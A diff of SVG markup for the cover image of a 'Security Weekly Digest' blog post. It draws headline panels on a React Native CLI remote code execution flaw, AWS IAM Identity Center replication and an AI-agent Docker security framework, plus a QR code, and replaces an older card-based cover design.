+<text x="202" y="548" font-family="'Arial',sans-serif" font-size="9" fill="#FFD060">HIGH PROB</text>
+<line x1="308" y1="490" x2="308" y2="558" stroke="#E63946" stroke-width="0.4" opacity="0.3"/>
+
+<text x="322" y="502" font-family="'Arial',sans-serif" font-size="10" fill="#8899AA" letter-spacing="1">ATTACK</text>
+<text x="322" y="522" font-family="'Arial Black','Arial',sans-serif" font-size="14" fill="#FFFFFF" font-weight="900">UNAUTHENTICATED</text>
+<text x="322" y="540" font-family="'Arial',sans-serif" font-size="12" fill="#FF8C94">REMOTE CODE EXEC</text>
+<text x="322" y="557" font-family="'Arial',sans-serif" font-size="9" fill="#8899AA">@react-native-community/cli</text>
+<line x1="536" y1="490" x2="536" y2="558" stroke="#E63946" stroke-width="0.4" opacity="0.3"/>
+
+<text x="548" y="502" font-family="'Arial',sans-serif" font-size="10" fill="#8899AA" letter-spacing="1">STATUS</text>
+<text x="548" y="522" font-family="'Arial Black','Arial',sans-serif" font-size="11" fill="#E63946" font-weight="900">ACTIVELY</text>
+<text x="548" y="538" font-family="'Arial Black','Arial',sans-serif" font-size="11" fill="#E63946" font-weight="900">EXPLOITED</text>
+<text x="548" y="554" font-family="'Arial',sans-serif" font-size="8" fill="#8899AA">Since Dec 2025</text>
+
+<!-- TOP-RIGHT PANEL: AWS IAM Identity Center (516x248 at 652,80) -->
+<rect x="652" y="80" width="516" height="248" rx="10" fill="url(#topRightGrad)"/>
+<rect x="652" y="80" width="516" height="248" rx="10" fill="#0C1520" opacity="0.65"/>
+<rect x="652" y="80" width="516" height="5" fill="#FF9900"/>
+<rect x="652" y="80" width="516" height="248" rx="10" fill="none" stroke="#FF9900" stroke-width="0.7" stroke-opacity="0.3"/>
+
+<ellipse cx="910" cy="175" rx="180" ry="100" fill="url(#awsGlow)" opacity="0.5">
+  <animate attributeName="opacity" values="0.35;0.65;0.35" dur="6.8s" repeatCount="indefinite"/>
+</ellipse>
+
+<text x="672" y="115" font-family="'Courier New',Courier,monospace" font-size="9" fill="#FF9900" letter-spacing="3" opacity="0.9">P1 SECURITY  |  7-DAY RESPONSE</text>
+<text x="672" y="143" font-family="'Arial Black','Arial',sans-serif" font-size="19" fill="#FFFFFF" font-weight="900">AWS IAM Identity Center</text>
+<text x="672" y="164" font-family="'Arial',sans-serif" font-size="13" fill="#FF9900" font-weight="700">Multi-Region Replication Impact</text>
+
+<!-- Region node diagram -->
+<rect x="672" y="174" width="70" height="50" rx="5" fill="#FF9900" opacity="0.12" stroke="#FF9900" stroke-width="0.7"/>
+<text x="707" y="194" font-family="'Arial',sans-serif" font-size="8" fill="#FF9900" text-anchor="middle" font-weight="700">US-EAST-1</text>
+<text x="707" y="207" font-family="'Courier New',Courier,monospace" font-size="7" fill="#8899AA" text-anchor="middle">PRIMARY</text>
+<text x="707" y="219" font-family="'Courier New',Courier,monospace" font-size="7" fill="#4ADE80" text-anchor="middle">IAM-SSO</text>
+<line x1="744" y1="199" x2="780" y2="199" stroke="#FF9900" stroke-width="1" opacity="0.6" stroke-dasharray="3,2"/>
+<polygon points="780,196 786,199 780,202" fill="#FF9900" opacity="0.6"/>
+
+<rect x="788" y="174" width="70" height="50" rx="5" fill="#FF9900" opacity="0.12" stroke="#FF9900" stroke-width="0.7"/>
+<text x="823" y="194" font-family="'Arial',sans-serif" font-size="8" fill="#FF9900" text-anchor="middle" font-weight="700">EU-WEST-1</text>
+<text x="823" y="207" font-family="'Courier New',Courier,monospace" font-size="7" fill="#8899AA" text-anchor="middle">REPLICA</text>
+<text x="823" y="219" font-family="'Courier New',Courier,monospace" font-size="7" fill="#FFB703" text-anchor="middle">GDPR?</text>
+<line x1="860" y1="199" x2="896" y2="199" stroke="#FF9900" stroke-width="1" opacity="0.6" stroke-dasharray="3,2"/>
+<polygon points="896,196 902,199 896,202" fill="#FF9900" opacity="0.6"/>
+
+<rect x="904" y="174" width="70" height="50" rx="5" fill="#FF9900" opacity="0.12" stroke="#FF9900" stroke-width="0.7"/>
+<text x="939" y="194" font-family="'Arial',sans-serif" font-size="8" fill="#FF9900" text-anchor="middle" font-weight="700">AP-SE-1</text>
+<text x="939" y="207" font-family="'Courier New',Courier,monospace" font-size="7" fill="#8899AA" text-anchor="middle">REPLICA</text>
+<text x="939" y="219" font-family="'Courier New',Courier,monospace" font-size="7" fill="#FFB703" text-anchor="middle">DATA SOV.</text>
+
+<!-- Warning badge -->
+<rect x="990" y="180" width="28" height="28" rx="4" fill="none" stroke="#FF9900" stroke-width="1.2" stroke-opacity="0.6"/>
+<text x="1004" y="200" font-family="'Arial Black','Arial',sans-serif" font-size="16" fill="#FF9900" text-anchor="middle" font-weight="900">!</text>
+
+<!-- AWS KPI card -->
+<rect x="672" y="236" width="472" height="76" rx="6" fill="url(#kpiAws)"/>
+<rect x="672" y="236" width="3" height="76" rx="1" fill="#FF9900"/>
+<text x="690" y="258" font-family="'Arial',sans-serif" font-size="9" fill="#8899AA" letter-spacing="1">SCOPE</text>
+<text x="690" y="278" font-family="'Arial',sans-serif" font-size="13" fill="#FF9900" font-weight="700">Multi-Region SSO Replication</text>
+<text x="690" y="298" font-family="'Arial',sans-serif" font-size="10" fill="#AABBCC">Data sovereignty + IAM policy blast radius</text>
+<line x1="900" y1="246" x2="900" y2="304" stroke="#FF9900" stroke-width="0.4" opacity="0.3"/>
+<text x="916" y="258" font-family="'Arial',sans-serif" font-size="9" fill="#8899AA" letter-spacing="1">PRIORITY</text>
+<text x="916" y="282" font-family="'Arial Black','Arial',sans-serif" font-size="22" fill="#FF9900" font-weight="900">P1</text>
+<text x="916" y="300" font-family="'Arial',sans-serif" font-size="9" fill="#AABBCC">7-day response</text>
+
+<!-- BOTTOM-RIGHT PANEL: AI Agent 3Cs Framework (516x246 at 652,344) -->
+<rect x="652" y="344" width="516" height="246" rx="10" fill="url(#botRightGrad)"/>
+<rect x="652" y="344" width="516" height="246" rx="10" fill="#080F14" opacity="0.65"/>
+<rect x="652" y="344" width="516" height="5" fill="#0DB7ED"/>
+<rect x="652" y="344" width="516" height="246" rx="10" fill="none" stroke="#0DB7ED" stroke-width="0.7" stroke-opacity="0.3"/>
+
+<ellipse cx="910" cy="455" rx="180" ry="100" fill="url(#dockerGlow)" opacity="0.5">
+  <animate attributeName="opacity" values="0.3;0.6;0.3" dur="7.5s" repeatCount="indefinite"/>
+</ellipse>
+
+<text x="672" y="378" font-family="'Courier New',Courier,monospace" font-size="9" fill="#0DB7ED" letter-spacing="3" opacity="0.9">P1 FRAMEWORK  |  AI AGENT SECURITY</text>
+<text x="672" y="406" font-family="'Arial Black','Arial',sans-serif" font-size="19" fill="#FFFFFF" font-weight="900">AI Agent 3Cs Framework</text>
+<text x="672" y="427" font-family="'Arial',sans-serif" font-size="12" fill="#0DB7ED" font-weight="700">Docker Security -- Container, Credential, Code</text>
+
+<!-- 3Cs pillars -->
+<rect x="672" y="438" width="138" height="80" rx="6" fill="#0DB7ED" opacity="0.1" stroke="#0DB7ED" stroke-width="0.8"/>
+<rect x="672" y="438" width="138" height="5" rx="2" fill="#0DB7ED" opacity="0.5"/>
+<text x="741" y="468" font-family="'Arial Black','Arial',sans-serif" font-size="14" fill="#0DB7ED" text-anchor="middle" font-weight="900">C1</text>
+<text x="741" y="484" font-family="'Arial',sans-serif" font-size="11" fill="#FFFFFF" text-anchor="middle" font-weight="700">Container</text>
+<text x="741" y="499" font-family="'Arial',sans-serif" font-size="8" fill="#8899AA" text-anchor="middle">Isolation boundary</text>
+<text x="741" y="512" font-family="'Arial',sans-serif" font-size="8" fill="#8899AA" text-anchor="middle">for AI workloads</text>
+
+<rect x="826" y="438" width="138" height="80" rx="6" fill="#0DB7ED" opacity="0.1" stroke="#0DB7ED" stroke-width="0.8"/>
+<rect x="826" y="438" width="138" height="5" rx="2" fill="#0DB7ED" opacity="0.5"/>
+<text x="895" y="468" font-family="'Arial Black','Arial',sans-serif" font-size="14" fill="#0DB7ED" text-anchor="middle" font-weight="900">C2</text>
+<text x="895" y="484" font-family="'Arial',sans-serif" font-size="11" fill="#FFFFFF" text-anchor="middle" font-weight="700">Credential</text>
+<text x="895" y="499" font-family="'Arial',sans-serif" font-size="8" fill="#8899AA" text-anchor="middle">Least-privilege</text>
+<text x="895" y="512" font-family="'Arial',sans-serif" font-size="8" fill="#8899AA" text-anchor="middle">secrets management</text>
+
+<rect x="980" y="438" width="138" height="80" rx="6" fill="#0DB7ED" opacity="0.1" stroke="#0DB7ED" stroke-width="0.8"/>
+<rect x="980" y="438" width="138" height="5" rx="2" fill="#0DB7ED" opacity="0.5"/>
+<text x="1049" y="468" font-family="'Arial Black','Arial',sans-serif" font-size="14" fill="#0DB7ED" text-anchor="middle" font-weight="900">C3</text>
+<text x="1049" y="484" font-family="'Arial',sans-serif" font-size="11" fill="#FFFFFF" text-anchor="middle" font-weight="700">Code</text>
+<text x="1049" y="499" font-family="'Arial',sans-serif" font-size="8" fill="#8899AA" text-anchor="middle">Supply chain</text>
+<text x="1049" y="512" font-family="'Arial',sans-serif" font-size="8" fill="#8899AA" text-anchor="middle">integrity checks</text>
+
+<!-- Docker KPI card -->
+<rect x="672" y="528" width="472" height="50" rx="6" fill="url(#kpiDocker)"/>
+<rect x="672" y="528" width="3" height="50" rx="1" fill="#0DB7ED"/>
+<text x="690" y="548" font-family="'Arial',sans-serif" font-size="9" fill="#8899AA" letter-spacing="1">SOURCE</text>
+<text x="690" y="568" font-family="'Arial',sans-serif" font-size="12" fill="#0DB7ED" font-weight="700">Docker Ask Gordon AI -- DockerDash security model</text>
+<line x1="940" y1="534" x2="940" y2="572" stroke="#0DB7ED" stroke-width="0.4" opacity="0.3"/>
+<text x="956" y="548" font-family="'Arial',sans-serif" font-size="9" fill="#8899AA" letter-spacing="1">PILLARS</text>
+<text x="956" y="568" font-family="'Arial Black','Arial',sans-serif" font-size="14" fill="#0DB7ED" font-weight="900">3Cs</text>
+
+<!-- FOOTER -->
+<rect x="0" y="598" width="1200" height="32" fill="#080C14"/>
+<rect x="0" y="598" width="1200" height="1.5" fill="#1A2440"/>
+<text x="32" y="618" font-family="'Courier New',Courier,monospace" font-size="9" fill="#4A5568" letter-spacing="1">tech.2twodragon.com</text>
+<text x="600" y="618" font-family="'Courier New',Courier,monospace" font-size="9" fill="#4A5568" text-anchor="middle" letter-spacing="1">DevSecOps  |  Docker  |  CVE  |  AWS  |  AI-Agent</text>
+<text x="1168" y="618" font-family="'Courier New',Courier,monospace" font-size="9" fill="#4A5568" text-anchor="end" letter-spacing="1">Weekly Digest</text>
+
+<!-- cover-qr: https://tech.2twodragon.com/posts/2026/02/04/Tech_Security_Weekly_Digest_AI_Docker_Data_Go/ : 41x41 -->
+<g transform="translate(1080,504)" filter="url(#softShadow)">
+  <rect x="-8" y="-8" width="100" height="100" rx="6" fill="#FFFFFF"/>
+  <g transform="scale(2.048780)" fill="#0A1020">
+    <path d="M0 0h7v1h-7zM8 0h2v1h-2zM11 0h2v1h-2zM16 0h1v1h-1zM18 0h1v1h-1zM21 0h1v1h-1zM23 0h1v1h-1zM26 0h1v1h-1zM29 0h2v1h-2zM34 0h7v1h-7zM0 1h1v1h-1zM6 1h1v1h-1zM10 1h1v1h-1zM13 1h3v1h-3zM17 1h2v1h-2zM25 1h2v1h-2zM29 1h2v1h-2zM32 1h1v1h-1zM34 1h1v1h-1zM40 1h1v1h-1zM0 2h1v1h-1zM2 2h3v1h-3zM6 2h1v1h-1zM8 2h1v1h-1zM12 2h1v1h-1zM15 2h2v1h-2zM18 2h2v1h-2zM21 2h1v1h-1zM23 2h1v1h-1zM26 2h2v1h-2zM29 2h1v1h-1zM31 2h1v1h-1zM34 2h1v1h-1zM36 2h3v1h-3zM40 2h1v1h-1zM0 3h1v1h-1zM2 3h3v1h-3zM6 3h1v1h-1zM9 3h3v1h-3zM13 3h4v1h-4zM18 3h1v1h-1zM20 3h1v1h-1zM24 3h1v1h-1zM26 3h1v1h-1zM28 3h3v1h-3zM32 3h1v1h-1zM34 3h1v1h-1zM36 3h3v1h-3zM40 3h1v1h-1zM0 4h1v1h-1zM2 4h3v1h-3zM6 4h1v1h-1zM10 4h1v1h-1zM13 4h3v1h-3zM18 4h2v1h-2zM21 4h1v1h-1zM23 4h1v1h-1zM25 4h2v1h-2zM28 4h3v1h-3zM32 4h1v1h-1zM34 4h1v1h-1zM36 4h3v1h-3zM40 4h1v1h-1zM0 5h1v1h-1zM6 5h1v1h-1zM8 5h1v1h-1zM10 5h1v1h-1zM12 5h1v1h-1zM14 5h5v1h-5zM20 5h2v1h-2zM24 5h2v1h-2zM30 5h1v1h-1zM34 5h1v1h-1zM40 5h1v1h-1zM0 6h7v1h-7zM8 6h1v1h-1zM10 6h1v1h-1zM12 6h1v1h-1zM14 6h1v1h-1zM16 6h1v1h-1zM18 6h1v1h-1zM20 6h1v1h-1zM22 6h1v1h-1zM24 6h1v1h-1zM26 6h1v1h-1zM28 6h1v1h-1zM30 6h1v1h-1zM32 6h1v1h-1zM34 6h7v1h-7zM12 7h1v1h-1zM14 7h3v1h-3zM19 7h2v1h-2zM23 7h2v1h-2zM31 7h1v1h-1zM0 8h1v1h-1zM2 8h1v1h-1zM6 8h2v1h-2zM9 8h2v1h-2zM12 8h2v1h-2zM15 8h1v1h-1zM20 8h1v1h-1zM27 8h1v1h-1zM31 8h1v1h-1zM35 8h1v1h-1zM38 8h1v1h-1zM40 8h1v1h-1zM1 9h1v1h-1zM3 9h1v1h-1zM7 9h1v1h-1zM9 9h1v1h-1zM12 9h5v1h-5zM19 9h1v1h-1zM23 9h2v1h-2zM26 9h2v1h-2zM31 9h3v1h-3zM35 9h1v1h-1zM38 9h3v1h-3zM4 10h3v1h-3zM9 10h6v1h-6zM16 10h1v1h-1zM18 10h4v1h-4zM23 10h2v1h-2zM26 10h6v1h-6zM33 10h2v1h-2zM36 10h3v1h-3zM40 10h1v1h-1zM1 11h4v1h-4zM7 11h2v1h-2zM10 11h1v1h-1zM15 11h1v1h-1zM18 11h3v1h-3zM24 11h1v1h-1zM27 11h2v1h-2zM31 11h3v1h-3zM36 11h2v1h-2zM39 11h1v1h-1zM0 12h1v1h-1zM3 12h4v1h-4zM9 12h2v1h-2zM12 12h2v1h-2zM16 12h1v1h-1zM23 12h2v1h-2zM26 12h1v1h-1zM30 12h1v1h-1zM32 12h1v1h-1zM34 12h1v1h-1zM40 12h1v1h-1zM1 13h1v1h-1zM3 13h2v1h-2zM13 13h1v1h-1zM16 13h2v1h-2zM21 13h1v1h-1zM24 13h2v1h-2zM29 13h2v1h-2zM32 13h4v1h-4zM37 13h4v1h-4zM0 14h4v1h-4zM5 14h2v1h-2zM8 14h2v1h-2zM14 14h1v1h-1zM19 14h1v1h-1zM24 14h4v1h-4zM30 14h2v1h-2zM33 14h2v1h-2zM40 14h1v1h-1zM1 15h4v1h-4zM8 15h1v1h-1zM10 15h3v1h-3zM15 15h2v1h-2zM18 15h1v1h-1zM22 15h3v1h-3zM26 15h1v1h-1zM30 15h5v1h-5zM37 15h1v1h-1zM39 15h1v1h-1zM6 16h1v1h-1zM8 16h1v1h-1zM12 16h1v1h-1zM15 16h2v1h-2zM19 16h3v1h-3zM27 16h2v1h-2zM32 16h3v1h-3zM40 16h1v1h-1zM2 17h4v1h-4zM8 17h1v1h-1zM11 17h3v1h-3zM15 17h1v1h-1zM20 17h2v1h-2zM23 17h2v1h-2zM28 17h2v1h-2zM31 17h5v1h-5zM40 17h1v1h-1zM1 18h1v1h-1zM4 18h3v1h-3zM8 18h1v1h-1zM10 18h3v1h-3zM16 18h4v1h-4zM23 18h1v1h-1zM25 18h3v1h-3zM31 18h1v1h-1zM34 18h4v1h-4zM39 18h2v1h-2zM0 19h1v1h-1zM2 19h2v1h-2zM9 19h1v1h-1zM11 19h1v1h-1zM14 19h1v1h-1zM18 19h4v1h-4zM23 19h1v1h-1zM26 19h3v1h-3zM30 19h1v1h-1zM32 19h1v1h-1zM37 19h1v1h-1zM39 19h1v1h-1zM2 20h1v1h-1zM4 20h1v1h-1zM6 20h2v1h-2zM9 20h2v1h-2zM12 20h4v1h-4zM17 20h2v1h-2zM21 20h1v1h-1zM23 20h4v1h-4zM30 20h2v1h-2zM34 20h2v1h-2zM37 20h1v1h-1zM2 21h3v1h-3zM9 21h2v1h-2zM13 21h1v1h-1zM16 21h1v1h-1zM18 21h1v1h-1zM20 21h1v1h-1zM23 21h1v1h-1zM26 21h2v1h-2zM31 21h1v1h-1zM33 21h3v1h-3zM40 21h1v1h-1zM1 22h4v1h-4zM6 22h3v1h-3zM11 22h2v1h-2zM18 22h8v1h-8zM27 22h1v1h-1zM29 22h1v1h-1zM31 22h1v1h-1zM35 22h3v1h-3zM40 22h1v1h-1zM0 23h2v1h-2zM4 23h1v1h-1zM8 23h1v1h-1zM16 23h1v1h-1zM18 23h1v1h-1zM22 23h1v1h-1zM24 23h1v1h-1zM27 23h2v1h-2zM30 23h6v1h-6zM37 23h1v1h-1zM39 23h2v1h-2zM0 24h1v1h-1zM3 24h1v1h-1zM6 24h1v1h-1zM9 24h2v1h-2zM12 24h3v1h-3zM16 24h1v1h-1zM20 24h1v1h-1zM23 24h2v1h-2zM28 24h1v1h-1zM32 24h1v1h-1zM34 24h1v1h-1zM38 24h2v1h-2zM1 25h2v1h-2zM4 25h2v1h-2zM7 25h1v1h-1zM12 25h1v1h-1zM16 25h1v1h-1zM19 25h2v1h-2zM23 25h5v1h-5zM31 25h1v1h-1zM33 25h1v1h-1zM35 25h1v1h-1zM37 25h1v1h-1zM40 25h1v1h-1zM0 26h5v1h-5zM6 26h1v1h-1zM8 26h1v1h-1zM10 26h1v1h-1zM13 26h2v1h-2zM16 26h2v1h-2zM19 26h1v1h-1zM21 26h1v1h-1zM23 26h1v1h-1zM27 26h2v1h-2zM30 26h2v1h-2zM34 26h5v1h-5zM40 26h1v1h-1zM2 27h1v1h-1zM4 27h2v1h-2zM7 27h3v1h-3zM12 27h3v1h-3zM16 27h1v1h-1zM18 27h3v1h-3zM22 27h3v1h-3zM26 27h1v1h-1zM31 27h2v1h-2zM35 27h1v1h-1zM37 27h1v1h-1zM39 27h2v1h-2zM0 28h1v1h-1zM2 28h2v1h-2zM6 28h1v1h-1zM8 28h1v1h-1zM12 28h2v1h-2zM15 28h2v1h-2zM20 28h1v1h-1zM26 28h1v1h-1zM28 28h1v1h-1zM30 28h1v1h-1zM34 28h1v1h-1zM39 28h1v1h-1zM4 29h2v1h-2zM7 29h1v1h-1zM14 29h2v1h-2zM20 29h1v1h-1zM26 29h1v1h-1zM28 29h3v1h-3zM32 29h1v1h-1zM34 29h2v1h-2zM39 29h2v1h-2zM0 30h3v1h-3zM4 30h3v1h-3zM8 30h1v1h-1zM10 30h1v1h-1zM12 30h1v1h-1zM15 30h1v1h-1zM18 30h1v1h-1zM20 30h4v1h-4zM28 30h2v1h-2zM31 30h1v1h-1zM33 30h1v1h-1zM37 30h2v1h-2zM40 30h1v1h-1zM2 31h3v1h-3zM8 31h1v1h-1zM10 31h1v1h-1zM15 31h2v1h-2zM18 31h3v1h-3zM22 31h1v1h-1zM26 31h3v1h-3zM34 31h4v1h-4zM39 31h2v1h-2zM0 32h3v1h-3zM6 32h4v1h-4zM11 32h2v1h-2zM16 32h1v1h-1zM21 32h1v1h-1zM23 32h1v1h-1zM31 32h7v1h-7zM39 32h2v1h-2zM8 33h1v1h-1zM11 33h1v1h-1zM15 33h3v1h-3zM20 33h1v1h-1zM23 33h3v1h-3zM28 33h3v1h-3zM32 33h1v1h-1zM36 33h1v1h-1zM38 33h1v1h-1zM40 33h1v1h-1zM0 34h7v1h-7zM8 34h3v1h-3zM12 34h2v1h-2zM15 34h2v1h-2zM19 34h1v1h-1zM21 34h3v1h-3zM27 34h1v1h-1zM32 34h1v1h-1zM34 34h1v1h-1zM36 34h1v1h-1zM38 34h1v1h-1zM40 34h1v1h-1zM0 35h1v1h-1zM6 35h1v1h-1zM10 35h1v1h-1zM12 35h1v1h-1zM14 35h1v1h-1zM16 35h2v1h-2zM22 35h1v1h-1zM24 35h2v1h-2zM30 35h3v1h-3zM36 35h2v1h-2zM39 35h2v1h-2zM0 36h1v1h-1zM2 36h3v1h-3zM6 36h1v1h-1zM10 36h2v1h-2zM15 36h3v1h-3zM20 36h4v1h-4zM25 36h1v1h-1zM28 36h9v1h-9zM0 37h1v1h-1zM2 37h3v1h-3zM6 37h1v1h-1zM10 37h3v1h-3zM14 37h2v1h-2zM17 37h1v1h-1zM19 37h2v1h-2zM22 37h2v1h-2zM27 37h1v1h-1zM31 37h2v1h-2zM35 37h5v1h-5zM0 38h1v1h-1zM2 38h3v1h-3zM6 38h1v1h-1zM8 38h1v1h-1zM10 38h2v1h-2zM16 38h1v1h-1zM18 38h2v1h-2zM23 38h2v1h-2zM27 38h2v1h-2zM30 38h1v1h-1zM32 38h2v1h-2zM36 38h1v1h-1zM40 38h1v1h-1zM0 39h1v1h-1zM6 39h1v1h-1zM9 39h2v1h-2zM12 39h1v1h-1zM15 39h2v1h-2zM18 39h2v1h-2zM22 39h1v1h-1zM26 39h3v1h-3zM30 39h1v1h-1zM32 39h1v1h-1zM37 39h1v1h-1zM0 40h7v1h-7zM8 40h1v1h-1zM13 40h1v1h-1zM17 40h1v1h-1zM19 40h2v1h-2zM23 40h2v1h-2zM27 40h2v1h-2zM31 40h2v1h-2zM36 40h3v1h-3zM40 40h1v1h-1z"/>
   </g>
-
-  <!-- Glow orbs -->
-  <circle cx="200" cy="300" r="200" fill="#ef4444" opacity="0.06" filter="url(#glow)"/>
-  <circle cx="600" cy="350" r="180" fill="#f59e0b" opacity="0.05" filter="url(#glow)"/>
-  <circle cx="1000" cy="300" r="180" fill="#3b82f6" opacity="0.06" filter="url(#glow)"/>
-
-  <!-- Header -->
-  <rect x="0" y="0" width="1200" height="80" fill="url(#hg)" opacity="0.9"/>
-  <rect x="0" y="78" width="1200" height="2" fill="#334155" opacity="0.8"/>
-  <g transform="translate(48,40)">
-    <path d="M0,-22 L18,-12 L18,3 C18,13 10,20 0,24 C-10,20 -18,13 -18,3 L-18,-12 Z" fill="#1e3a5f" stroke="#3b82f6" stroke-width="1.5"/>
-    <path d="M-7,1 L-2,6 L8,-5" stroke="#3b82f6" stroke-width="2.5" fill="none" stroke-linecap="round"/>
-  </g>
-  <text x="80" y="44" font-family="Arial,sans-serif" font-size="28" font-weight="700" fill="#f1f5f9">Security Weekly Digest</text>
-  <rect x="990" y="18" width="178" height="44" rx="6" fill="#1e293b" stroke="#334155" stroke-width="1"/>
-  <text x="1079" y="48" font-family="Arial,sans-serif" font-size="15" font-weight="700" fill="#94a3b8" text-anchor="middle">February 04, 2026</text>
-
-  <!-- Card 1: CVE-2025-119 -->
-  <rect x="32" y="100" width="220" height="120" rx="8" fill="#1a0505" stroke="#ef4444" stroke-width="1.5"/>
-  <circle cx="52" cy="120" r="6" fill="#ef4444"/>
-  <g transform="translate(142,148)">
-    <path d="M0,-18 L16,12 L-16,12 Z" fill="none" stroke="#ef4444" stroke-width="1.8"/><text x="0" y="6" font-family="Courier New" font-size="9" font-weight="700" fill="#ef4444" text-anchor="middle">CVE</text>
-  </g>
-  <text x="142" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#ef4444" text-anchor="middle">CVE-2025-119</text>
-  <!-- Card 2: CVE PATCH -->
-  <rect x="268" y="100" width="220" height="120" rx="8" fill="#1a0d0d" stroke="#f59e0b" stroke-width="1.5"/>
-  <circle cx="288" cy="120" r="6" fill="#f59e0b"/>
-  <g transform="translate(378,148)">
-    <path d="M0,-18 L16,12 L-16,12 Z" fill="none" stroke="#f59e0b" stroke-width="1.8"/><text x="0" y="6" font-family="Courier New" font-size="9" font-weight="700" fill="#f59e0b" text-anchor="middle">CVE</text>
-  </g>
-  <text x="378" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#f59e0b" text-anchor="middle">CVE PATCH</text>
-  <!-- Card 3: AI AGENT -->
-  <rect x="504" y="100" width="220" height="120" rx="8" fill="#0a1020" stroke="#3b82f6" stroke-width="1.5"/>
-  <circle cx="524" cy="120" r="6" fill="#3b82f6"/>
-  <g transform="translate(614,148)">
-    <circle cx="-12" cy="-8" r="4" fill="none" stroke="#3b82f6" stroke-width="1.5"/><circle cx="12" cy="-8" r="4" fill="none" stroke="#3b82f6" stroke-width="1.5"/><circle cx="0" cy="8" r="5" fill="none" stroke="#3b82f6" stroke-width="1.8"/><line x1="-8" y1="-6" x2="-2" y2="6" stroke="#3b82f6" stroke-width="1.2" opacity="0.7"/><line x1="8" y1="-6" x2="2" y2="6" stroke="#3b82f6" stroke-width="1.2" opacity="0.7"/><line x1="-8" y1="-8" x2="8" y2="-8" stroke="#3b82f6" stroke-width="1.2" opacity="0.5"/>
-  </g>
-  <text x="614" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#3b82f6" text-anchor="middle">AI AGENT</text>
-  <!-- Card 4: DOCKER CTR -->
-  <rect x="740" y="100" width="200" height="120" rx="8" fill="#071a10" stroke="#22c55e" stroke-width="1.5"/>
-  <circle cx="760" cy="120" r="6" fill="#22c55e"/>
-  <g transform="translate(840,148)">
-    <rect x="-14" y="-16" width="10" height="8" rx="2" fill="none" stroke="#22c55e" stroke-width="1.5"/><rect x="-2" y="-16" width="10" height="8" rx="2" fill="none" stroke="#22c55e" stroke-width="1.5"/><rect x="-14" y="-6" width="10" height="8" rx="2" fill="none" stroke="#22c55e" stroke-width="1.5"/><rect x="-2" y="-6" width="10" height="8" rx="2" fill="none" stroke="#22c55e" stroke-width="1.5"/><path d="M-16,8 C-10,18 10,18 16,8" fill="none" stroke="#22c55e" stroke-width="1.5"/>
-  </g>
-  <text x="840" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#22c55e" text-anchor="middle">DOCKER CTR</text>
-  <!-- Card 5: SEC OPS -->
-  <rect x="956" y="100" width="212" height="120" rx="8" fill="#071a20" stroke="#22d3ee" stroke-width="1.5"/>
-  <circle cx="976" cy="120" r="6" fill="#22d3ee"/>
-  <g transform="translate(1062,148)">
-    <path d="M0,-16 L14,-8 L14,4 C14,12 8,16 0,20 C-8,16 -14,12 -14,4 L-14,-8 Z" fill="none" stroke="#22d3ee" stroke-width="1.8"/>
-  </g>
-  <text x="1062" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#22d3ee" text-anchor="middle">SEC OPS</text>
-
-  <!-- Threat map area -->
-  <rect x="32" y="240" width="1136" height="220" rx="10" fill="#0c1220" stroke="#1e293b" stroke-width="1"/>
-
-  <!-- Ambient dots -->
-  <g opacity="0.25">
-    <circle cx="180" cy="330" r="2" fill="#94a3b8"/><circle cx="200" cy="340" r="2" fill="#94a3b8"/>
-    <circle cx="550" cy="310" r="2" fill="#94a3b8"/><circle cx="570" cy="325" r="2" fill="#94a3b8"/>
-    <circle cx="750" cy="320" r="2" fill="#94a3b8"/><circle cx="900" cy="330" r="2" fill="#94a3b8"/>
-    <circle cx="350" cy="350" r="2" fill="#94a3b8"/><circle cx="1000" cy="340" r="2" fill="#94a3b8"/>
-  </g>
-  <!-- Node: CVE-2025-119 -->
-  <circle cx="170" cy="340" r="22" fill="#1a0505" stroke="#ef4444" stroke-width="2"/>
-  <text x="170" y="344" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#ef4444" text-anchor="middle">CVE-2</text>
-  <!-- Node: CVE PATCH -->
-  <circle cx="370" cy="350" r="20" fill="#1a0d0d" stroke="#f59e0b" stroke-width="2"/>
-  <text x="370" y="354" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#f59e0b" text-anchor="middle">CVE</text>
-  <!-- Node: AI AGENT -->
-  <circle cx="580" cy="330" r="22" fill="#0a1020" stroke="#3b82f6" stroke-width="2"/>
-  <text x="580" y="334" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#3b82f6" text-anchor="middle">AI</text>
-  <!-- Node: DOCKER CTR -->
-  <circle cx="780" cy="355" r="18" fill="#071a10" stroke="#22c55e" stroke-width="2"/>
-  <text x="780" y="359" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#22c55e" text-anchor="middle">DOCK</text>
-  <!-- Node: SEC OPS -->
-  <circle cx="980" cy="340" r="22" fill="#071a20" stroke="#22d3ee" stroke-width="2"/>
-  <text x="980" y="344" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#22d3ee" text-anchor="middle">SEC</text>
-  <line x1="192" y1="340" x2="350" y2="350" stroke="#ef4444" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="390" y1="350" x2="558" y2="330" stroke="#f59e0b" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="602" y1="330" x2="762" y2="355" stroke="#3b82f6" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="798" y1="355" x2="958" y2="340" stroke="#22c55e" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-
-  <!-- Footer -->
-  <rect x="0" y="472" width="1200" height="158" fill="#080c18" opacity="0.95"/>
-  <rect x="0" y="472" width="1200" height="2" fill="#1e293b"/>
-
-  <!-- Tags -->
-  <rect x="32" y="490" width="128" height="24" rx="4" fill="#1a0505" stroke="#ef4444" stroke-width="1"/>
-  <text x="96" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#ef4444" text-anchor="middle">CVE-2025-119</text>
-  <rect x="172" y="490" width="101" height="24" rx="4" fill="#1a0d0d" stroke="#f59e0b" stroke-width="1"/>
